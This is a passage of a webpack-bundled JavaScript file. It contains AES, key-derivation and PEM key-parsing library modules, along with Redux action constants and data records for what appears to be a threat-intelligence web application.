    t = (x8 * 0x1010101) ^ (x4 * 0x10001) ^ (x2 * 0x101) ^ (x * 0x1010100)
    INV_SUB_MIX[0][sx] = (t << 24) | (t >>> 8)
    INV_SUB_MIX[1][sx] = (t << 16) | (t >>> 16)
    INV_SUB_MIX[2][sx] = (t << 8) | (t >>> 24)
    INV_SUB_MIX[3][sx] = t

    if (x === 0) {
      x = xi = 1
    } else {
      x = x2 ^ d[d[d[x8 ^ x2]]]
      xi ^= d[d[xi]]
    }
  }

  return {
    SBOX: SBOX,
    INV_SBOX: INV_SBOX,
    SUB_MIX: SUB_MIX,
    INV_SUB_MIX: INV_SUB_MIX
  }
})()

function AES (key) {
  this._key = asUInt32Array(key)
  this._reset()
}

AES.blockSize = 4 * 4
AES.keySize = 256 / 8
AES.prototype.blockSize = AES.blockSize
AES.prototype.keySize = AES.keySize
AES.prototype._reset = function () {
  var keyWords = this._key
  var keySize = keyWords.length
  var nRounds = keySize + 6
  var ksRows = (nRounds + 1) * 4

  var keySchedule = []
  for (var k = 0; k < keySize; k++) {
    keySchedule[k] = keyWords[k]
  }

  for (k = keySize; k < ksRows; k++) {
    var t = keySchedule[k - 1]

    if (k % keySize === 0) {
      t = (t << 8) | (t >>> 24)
      t =
        (G.SBOX[t >>> 24] << 24) |
        (G.SBOX[(t >>> 16) & 0xff] << 16) |
        (G.SBOX[(t >>> 8) & 0xff] << 8) |
        (G.SBOX[t & 0xff])

      t ^= RCON[(k / keySize) | 0] << 24
    } else if (keySize > 6 && k % keySize === 4) {
      t =
        (G.SBOX[t >>> 24] << 24) |
        (G.SBOX[(t >>> 16) & 0xff] << 16) |
        (G.SBOX[(t >>> 8) & 0xff] << 8) |
        (G.SBOX[t & 0xff])
    }

    keySchedule[k] = keySchedule[k - keySize] ^ t
  }

  var invKeySchedule = []
  for (var ik = 0; ik < ksRows; ik++) {
    var ksR = ksRows - ik
    var tt = keySchedule[ksR - (ik % 4 ? 0 : 4)]

    if (ik < 4 || ksR <= 4) {
      invKeySchedule[ik] = tt
    } else {
      invKeySchedule[ik] =
        G.INV_SUB_MIX[0][G.SBOX[tt >>> 24]] ^
        G.INV_SUB_MIX[1][G.SBOX[(tt >>> 16) & 0xff]] ^
        G.INV_SUB_MIX[2][G.SBOX[(tt >>> 8) & 0xff]] ^
        G.INV_SUB_MIX[3][G.SBOX[tt & 0xff]]
    }
  }

  this._nRounds = nRounds
  this._keySchedule = keySchedule
  this._invKeySchedule = invKeySchedule
}

AES.prototype.encryptBlockRaw = function (M) {
  M = asUInt32Array(M)
  return cryptBlock(M, this._keySchedule, G.SUB_MIX, G.SBOX, this._nRounds)
}

AES.prototype.encryptBlock = function (M) {
  var out = this.encryptBlockRaw(M)
  var buf = Buffer.allocUnsafe(16)
  buf.writeUInt32BE(out[0], 0)
  buf.writeUInt32BE(out[1], 4)
  buf.writeUInt32BE(out[2], 8)
  buf.writeUInt32BE(out[3], 12)
  return buf
}

AES.prototype.decryptBlock = function (M) {
  M = asUInt32Array(M)

  // swap
  var m1 = M[1]
  M[1] = M[3]
  M[3] = m1

  var out = cryptBlock(M, this._invKeySchedule, G.INV_SUB_MIX, G.INV_SBOX, this._nRounds)
  var buf = Buffer.allocUnsafe(16)
  buf.writeUInt32BE(out[0], 0)
  buf.writeUInt32BE(out[3], 4)
  buf.writeUInt32BE(out[2], 8)
  buf.writeUInt32BE(out[1], 12)
  return buf
}

AES.prototype.scrub = function () {
  scrubVec(this._keySchedule)
  scrubVec(this._invKeySchedule)
  scrubVec(this._key)
}

module.exports.AES = AES


/***/ }),
/* 489 */
/***/ (function(module, exports, __webpack_require__) {

var Buffer = __webpack_require__(2695).Buffer
var MD5 = __webpack_require__(684)

/* eslint-disable camelcase */
function EVP_BytesToKey (password, salt, keyBits, ivLen) {
  if (!Buffer.isBuffer(password)) password = Buffer.from(password, 'binary')
  if (salt) {
    if (!Buffer.isBuffer(salt)) salt = Buffer.from(salt, 'binary')
    if (salt.length !== 8) throw new RangeError('salt should be Buffer with 8 byte length')
  }

  var keyLen = keyBits / 8
  var key = Buffer.alloc(keyLen)
  var iv = Buffer.alloc(ivLen || 0)
  var tmp = Buffer.alloc(0)

  while (keyLen > 0 || ivLen > 0) {
    var hash = new MD5()
    hash.update(tmp)
    hash.update(password)
    if (salt) hash.update(salt)
    tmp = hash.digest()

    var used = 0

    if (keyLen > 0) {
      var keyStart = key.length - keyLen
      used = Math.min(keyLen, tmp.length)
      tmp.copy(key, keyStart, 0, used)
      keyLen -= used
    }

    if (used < tmp.length && ivLen > 0) {
      var ivStart = iv.length - ivLen
      var length = Math.min(ivLen, tmp.length - used)
      tmp.copy(iv, ivStart, used, used + length)
      ivLen -= length
    }
  }

  tmp.fill(0)
  return { key: key, iv: iv }
}

module.exports = EVP_BytesToKey


/***/ }),
/* 490 */,
/* 491 */
/***/ (function(module, exports, __webpack_require__) {

/* WEBPACK VAR INJECTION */(function(Buffer) {var asn1 = __webpack_require__(2726)
var aesid = __webpack_require__(2738)
var fixProc = __webpack_require__(2739)
var ciphers = __webpack_require__(692)
var compat = __webpack_require__(1244)
module.exports = parseKeys

function parseKeys (buffer) {
  var password
  if (typeof buffer === 'object' && !Buffer.isBuffer(buffer)) {
    password = buffer.passphrase
    buffer = buffer.key
  }
  if (typeof buffer === 'string') {
    buffer = new Buffer(buffer)
  }

  var stripped = fixProc(buffer, password)

  var type = stripped.tag
  var data = stripped.data
  var subtype, ndata
  switch (type) {
    case 'CERTIFICATE':
      ndata = asn1.certificate.decode(data, 'der').tbsCertificate.subjectPublicKeyInfo
      // falls through
    case 'PUBLIC KEY':
      if (!ndata) {
        ndata = asn1.PublicKey.decode(data, 'der')
      }
      subtype = ndata.algorithm.algorithm.join('.')
      switch (subtype) {
        case '1.2.840.113549.1.1.1':
          return asn1.RSAPublicKey.decode(ndata.subjectPublicKey.data, 'der')
        case '1.2.840.10045.2.1':
          ndata.subjectPrivateKey = ndata.subjectPublicKey
          return {
            type: 'ec',
            data: ndata
          }
        case '1.2.840.10040.4.1':
          ndata.algorithm.params.pub_key = asn1.DSAparam.decode(ndata.subjectPublicKey.data, 'der')
          return {
            type: 'dsa',
            data: ndata.algorithm.params
          }
        default: throw new Error('unknown key id ' + subtype)
      }
      throw new Error('unknown key type ' + type)
    case 'ENCRYPTED PRIVATE KEY':
      data = asn1.EncryptedPrivateKey.decode(data, 'der')
      data = decrypt(data, password)
      // falls through
    case 'PRIVATE KEY':
      ndata = asn1.PrivateKey.decode(data, 'der')
      subtype = ndata.algorithm.algorithm.join('.')
      switch (subtype) {
        case '1.2.840.113549.1.1.1':
          return asn1.RSAPrivateKey.decode(ndata.subjectPrivateKey, 'der')
        case '1.2.840.10045.2.1':
          return {
            curve: ndata.algorithm.curve,
            privateKey: asn1.ECPrivateKey.decode(ndata.subjectPrivateKey, 'der').privateKey
          }
        case '1.2.840.10040.4.1':
          ndata.algorithm.params.priv_key = asn1.DSAparam.decode(ndata.subjectPrivateKey, 'der')
          return {
            type: 'dsa',
            params: ndata.algorithm.params
          }
        default: throw new Error('unknown key id ' + subtype)
      }
      throw new Error('unknown key type ' + type)
    case 'RSA PUBLIC KEY':
      return asn1.RSAPublicKey.decode(data, 'der')
    case 'RSA PRIVATE KEY':
      return asn1.RSAPrivateKey.decode(data, 'der')
    case 'DSA PRIVATE KEY':
      return {
        type: 'dsa',
        params: asn1.DSAPrivateKey.decode(data, 'der')
      }
    case 'EC PRIVATE KEY':
      data = asn1.ECPrivateKey.decode(data, 'der')
      return {
        curve: data.parameters.value,
        privateKey: data.privateKey
      }
    default: throw new Error('unknown key type ' + type)
  }
}
parseKeys.signature = asn1.signature
function decrypt (data, password) {
  var salt = data.algorithm.decrypt.kde.kdeparams.salt
  var iters = parseInt(data.algorithm.decrypt.kde.kdeparams.iters.toString(), 10)
  var algo = aesid[data.algorithm.decrypt.cipher.algo.join('.')]
  var iv = data.algorithm.decrypt.cipher.iv
  var cipherText = data.subjectPrivateKey
  var keylen = parseInt(algo.split('-')[1], 10) / 8
  var key = compat.pbkdf2Sync(password, salt, iters, keylen)
  var cipher = ciphers.createDecipheriv(algo, key, iv)
  var out = []
  out.push(cipher.update(cipherText))
  out.push(cipher.final())
  return Buffer.concat(out)
}

/* WEBPACK VAR INJECTION */}.call(exports, __webpack_require__(43).Buffer))

/***/ }),
/* 492 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return matching; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return bucketing; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__lang__ = __webpack_require__(13);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/

/**
 * Verify type of key and return the set key property
 * If undefinedIfNotObj === true, it means that unless explicitly defined (using the Key object)
 * we will return undefined. (if it was a string, there's no bucketingKey)
 */

function KeyGetterFactory(keyProperty, undefinedIfNotObj) {
  if (undefinedIfNotObj === void 0) {
    undefinedIfNotObj = false;
  }

  return function getKeyProperty(key) {
    if (Object(__WEBPACK_IMPORTED_MODULE_0__lang__["i" /* isObject */])(key)) {
      return key[keyProperty];
    }

    return undefinedIfNotObj ? undefined : key;
  };
}

var matching = KeyGetterFactory('matchingKey');
var bucketing = KeyGetterFactory('bucketingKey', true);

/***/ }),
/* 493 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return ADD_ALERT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return DELETE_ALERT; });
var prefix = function prefix(str) {
  return 'station/alerts/' + str;
};

var ADD_ALERT = prefix('ADD_ALERT');
var DELETE_ALERT = prefix('DELETE_ALERT');

/***/ }),
/* 494 */,
/* 495 */,
/* 496 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return FETCH_ALL; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return FETCH_ALL_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return FETCH_ALL_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return SUBSCRIBE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return SUBSCRIBE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return SUBSCRIBE_FAILURE; });
var prefix = function prefix(str) {
  return 'station/data-feeds/' + str;
};

var FETCH_ALL = prefix('FETCH_ALL');
var FETCH_ALL_SUCCESS = prefix('FETCH_ALL_SUCCESS');
var FETCH_ALL_FAILURE = prefix('FETCH_ALL_FAILURE');

var SUBSCRIBE = prefix('SUBSCRIBE');
var SUBSCRIBE_SUCCESS = prefix('SUBSCRIBE_SUCCESS');
var SUBSCRIBE_FAILURE = prefix('SUBSCRIBE_FAILURE');

/***/ }),
/* 497 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return FETCH; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return FETCH_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return FETCH_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "j", function() { return SAVE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "l", function() { return SAVE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "k", function() { return SAVE_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return DELETE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return DELETE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return DELETE_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "m", function() { return SET_DISPLAY_OPTIONS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return FETCH_WITH_QUERY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "i", function() { return FETCH_WITH_QUERY_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "h", function() { return FETCH_WITH_QUERY_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "n", function() { return SET_QUERY_RESULTS; });
var prefix = function prefix(str) {
  return 'station/enclave-management/' + str;
};

var FETCH = prefix('FETCH');
var FETCH_SUCCESS = prefix('FETCH_SUCCESS');
var FETCH_FAILURE = prefix('FETCH_FAILURE');

var SAVE = prefix('SAVE');
var SAVE_SUCCESS = prefix('SAVE_SUCCESS');
var SAVE_FAILURE = prefix('SAVE_FAILURE');

var DELETE = prefix('DELETE');
var DELETE_SUCCESS = prefix('DELETE_SUCCESS');
var DELETE_FAILURE = prefix('DELETE_FAILURE');

var SET_DISPLAY_OPTIONS = prefix('SET_DISPLAY_OPTIONS');

// These actions are for querying the enclave map, the original enclave map was too coupled with everything to query without side effects
// This was the best safe solution in the time alotted
var FETCH_WITH_QUERY = prefix('FETCH_WITH_QUERY');
var FETCH_WITH_QUERY_SUCCESS = prefix('FETCH_WITH_QUERY_SUCCESS');
var FETCH_WITH_QUERY_FAILURE = prefix('FETCH_WITH_QUERY_FAILURE');
var SET_QUERY_RESULTS = prefix('SET_QUERY_RESULTS');

/***/ }),
/* 498 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return FETCH; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return FETCH_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return FETCH_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return SAVE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "i", function() { return SAVE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "h", function() { return SAVE_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return DELETE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return DELETE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return DELETE_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "j", function() { return SET_DISPLAY_OPTIONS; });
var prefix = function prefix(str) {
  return 'station/templates/' + str;
};

var FETCH = prefix('FETCH');
var FETCH_SUCCESS = prefix('FETCH_SUCCESS');
var FETCH_FAILURE = prefix('FETCH_FAILURE');

var SAVE = prefix('SAVE');
var SAVE_SUCCESS = prefix('SAVE_SUCCESS');
var SAVE_FAILURE = prefix('SAVE_FAILURE');

var DELETE = prefix('DELETE');
var DELETE_SUCCESS = prefix('DELETE_SUCCESS');
var DELETE_FAILURE = prefix('DELETE_FAILURE');

var SET_DISPLAY_OPTIONS = prefix('SET_DISPLAY_OPTIONS');

/***/ }),
/* 499 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SUBSCRIPTIONS_ENDPOINT", function() { return SUBSCRIPTIONS_ENDPOINT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "Subscription", function() { return Subscription; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);


var SUBSCRIPTIONS_ENDPOINT = '/services/subscriptions';

var Subscription = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  feedGuid: null,
  enclaveGuid: null,
  companyGuid: '',
  state: null,
  lastPulled: null,
  created: null,
  updated: null
});

/***/ }),
/* 500 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export validateDateSince */
/* unused harmony export validateDateUntil */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return computeDateRangeDaySelection; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return calculateDayRange; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_moment__ = __webpack_require__(141);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_moment___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_moment__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_date_fns_format__ = __webpack_require__(896);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_date_fns_format___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_date_fns_format__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_date_fns_distance_in_words_strict__ = __webpack_require__(1318);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_date_fns_distance_in_words_strict___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_date_fns_distance_in_words_strict__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_date_fns_is_today__ = __webpack_require__(1319);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_date_fns_is_today___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_date_fns_is_today__);





// Only dates before current date are valid
var validateDateSince = function validateDateSince(currentDateTime) {
  var dateNow = new Date();
  return currentDateTime.valueOf() < dateNow.valueOf();
};

// Only dates before the current date and after dateSince are valid
var validateDateUntil = function validateDateUntil(currentDateTime, dateSince) {
  var dateNow = new Date();
  return dateNow.valueOf() > currentDateTime.valueOf() && currentDateTime.valueOf() > dateSince;
};

// Given a number of days back, determine and return the appropriate date range
var computeDateRangeDaySelection = function computeDateRangeDaySelection(daysBack) {
  var dateSince = new Date();
  dateSince.setDate(dateSince.getDate() - daysBack);
  return {
    from: dateSince.getTime(),
    to: new Date().getTime()
  };
};

var calculateDayRange = function calculateDayRange(from, to) {
  var dateRange = void 0;

  if (__WEBPACK_IMPORTED_MODULE_3_date_fns_is_today___default()(to)) {
    dateRange = 'Past ' + __WEBPACK_IMPORTED_MODULE_2_date_fns_distance_in_words_strict___default()(from, to, { unit: 'd' });
  } else {
    var dateSince = __WEBPACK_IMPORTED_MODULE_1_date_fns_format___default()(from, 'MM-DD-YY');
    var dateUntil = __WEBPACK_IMPORTED_MODULE_1_date_fns_format___default()(to, 'MM-DD-YY');
    dateRange = dateSince + ' to ' + dateUntil;
  }

  return dateRange;
};

/***/ }),
/* 501 */,
/* 502 */,
/* 503 */,
/* 504 */,
/* 505 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return INIT; });
/* unused harmony export FETCH */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return FETCH_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return FETCH_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return SET_DATE_OPTIONS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return FETCH_UPDATED_TIME_RANGE; });
var prefix = function prefix(str) {
  return 'station/metrics/' + str;
};

// Called on initialization of the display component
var INIT = prefix('INIT');

var FETCH = prefix('FETCH');
var FETCH_SUCCESS = prefix('FETCH_SUCCESS');
var FETCH_FAILURE = prefix('FETCH_FAILURE');

var SET_DATE_OPTIONS = prefix('SET_DATE_OPTIONS');
var FETCH_UPDATED_TIME_RANGE = prefix('FETCH_UPDATED_TIME_RANGE');

/***/ }),
/* 506 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return REGISTER_ACTIVITY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return SET_DISPLAY_OPTIONS; });
var prefix = function prefix(str) {
  return 'station/marketplace/' + str;
};

var REGISTER_ACTIVITY = prefix('REGISTER_ACTIVITY');

var SET_DISPLAY_OPTIONS = prefix('SET_DISPLAY_OPTIONS');

/***/ }),
/* 507 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SET_CURRENT_CATEGORY_ID", function() { return SET_CURRENT_CATEGORY_ID; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "FETCH", function() { return FETCH; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "FETCH_SUCCESS", function() { return FETCH_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "FETCH_FAILURE", function() { return FETCH_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "FETCH_SHARED_LIBRARY", function() { return FETCH_SHARED_LIBRARY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "ADD_TERM_LOCAL", function() { return ADD_TERM_LOCAL; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "ADD_TERM_SHARED", function() { return ADD_TERM_SHARED; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SAVE", function() { return SAVE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SAVE_SUCCESS", function() { return SAVE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SAVE_FAILURE", function() { return SAVE_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "DELETE_TERM_LOCAL", function() { return DELETE_TERM_LOCAL; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "DELETE_TERM_SHARED", function() { return DELETE_TERM_SHARED; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "DELETE", function() { return DELETE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "DELETE_SUCCESS", function() { return DELETE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "DELETE_FAILURE", function() { return DELETE_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "UPLOAD_REDACTION_FILE", function() { return UPLOAD_REDACTION_FILE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BULK_ADD_TERMS", function() { return BULK_ADD_TERMS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BULK_SAVE_TERMS_LOCAL", function() { return BULK_SAVE_TERMS_LOCAL; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BULK_SAVE_TERMS_SHARED", function() { return BULK_SAVE_TERMS_SHARED; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BULK_SAVE", function() { return BULK_SAVE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BULK_SAVE_SUCCESS", function() { return BULK_SAVE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BULK_SAVE_FAILURE", function() { return BULK_SAVE_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "FETCH_REDACTABLES", function() { return FETCH_REDACTABLES; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "FETCH_REDACTABLES_SUCCESS", function() { return FETCH_REDACTABLES_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "FETCH_REDACTABLES_FAILURE", function() { return FETCH_REDACTABLES_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "CLEAR_REDACTABLES", function() { return CLEAR_REDACTABLES; });
var prefix = function prefix(str) {
  return 'station/redaction/' + str;
};

var SET_CURRENT_CATEGORY_ID = prefix('SET_CURRENT_CATEGORY_ID');

var FETCH = prefix('FETCH');
var FETCH_SUCCESS = prefix('FETCH_SUCCESS');
var FETCH_FAILURE = prefix('FETCH_FAILURE');

var FETCH_SHARED_LIBRARY = prefix('FETCH_SHARED_LIBRARY');

var ADD_TERM_LOCAL = prefix('ADD_TERM_LOCAL');
var ADD_TERM_SHARED = prefix('ADD_TERM_SHARED');

var SAVE = prefix('SAVE');
var SAVE_SUCCESS = prefix('SAVE_SUCCESS');
var SAVE_FAILURE = prefix('SAVE_FAILURE');

var DELETE_TERM_LOCAL = prefix('DELETE_TERM_LOCAL');
var DELETE_TERM_SHARED = prefix('DELETE_TERM_SHARED');

var DELETE = prefix('DELETE');
var DELETE_SUCCESS = prefix('DELETE_SUCCESS');
var DELETE_FAILURE = prefix('DELETE_FAILURE');

var UPLOAD_REDACTION_FILE = prefix('UPLOAD_REDACTION_FILE');
var BULK_ADD_TERMS = prefix('BULK_ADD_TERMS');

var BULK_SAVE_TERMS_LOCAL = prefix('BULK_SAVE_TERMS_LOCAL');
var BULK_SAVE_TERMS_SHARED = prefix('BULK_SAVE_TERMS_SHARED');

var BULK_SAVE = prefix('BULK_SAVE');
var BULK_SAVE_SUCCESS = prefix('BULK_SAVE_SUCCESS');
var BULK_SAVE_FAILURE = prefix('BULK_SAVE_FAILURE');

// Redactables
var FETCH_REDACTABLES = prefix('FETCH_REDACTABLES');
var FETCH_REDACTABLES_SUCCESS = prefix('FETCH_REDACTABLES_SUCCESS');
var FETCH_REDACTABLES_FAILURE = prefix('FETCH_REDACTABLES_FAILURE');

var CLEAR_REDACTABLES = prefix('CLEAR_REDACTABLES');

/***/ }),
/* 508 */,
/* 509 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "isReportType", function() { return isReportType; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "reportIdsFromList", function() { return reportIdsFromList; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "metadataUrl", function() { return metadataUrl; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "padWith", function() { return padWith; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "findReportInState", function() { return findReportInState; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);




var isReportType = function isReportType(x) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["normalizeType"])(x.get('type')) === 'incident_report';
};

var reportIdsFromList = Object(__WEBPACK_IMPORTED_MODULE_0_ramda__["compose"])(Object(__WEBPACK_IMPORTED_MODULE_0_ramda__["map"])(function (x) {
  return x.get('id');
}), Object(__WEBPACK_IMPORTED_MODULE_0_ramda__["filter"])(isReportType));

var metadataUrl = function metadataUrl(ids) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["querystring"])({ reportId: ids })('/services/incident-reports/metadata');
};

// Pad strings with a given character to a given length
var padWith = function padWith(chr, length) {
  var str = arguments.length > 2 && arguments[2] !== undefined ? arguments[2] : '';

  while (str.length < length) {
    str += chr;
  }
  return str;
};

var findReportInState = function findReportInState(reportId, reports, reportList) {
  var result = reports.getIn([reportId, 'data', 'id']) ? reports.getIn([reportId, 'data'], Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])()) : reportList.getIn([reportId, 'data'], Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])()) ? reportList.getIn([reportId, 'data'], Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])()) : reports.getIn([reportId, 'data', 'guid'], Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])());

  return result;
};

/***/ }),
/* 510 */,
/* 511 */,
/* 512 */,
/* 513 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return TAGS_ENDPOINT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return INDICATOR_TAGS_ENDPOINT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return Attribute; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return EnclaveTag; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return IndicatorTag; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);


var TAGS_ENDPOINT = '/services/tags';
var INDICATOR_TAGS_ENDPOINT = '/services/indicator-tags';

var Attribute = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  id: null,
  guid: '',
  count: -1,
  name: ''
});

var EnclaveTag = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  id: null,
  guid: '',
  count: -1,
  name: '',
  enclaveId: ''
});

/* Custom enclave-specific tags for indicators */
var IndicatorTag = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  guid: '',
  name: '',
  enclaveId: ''
});

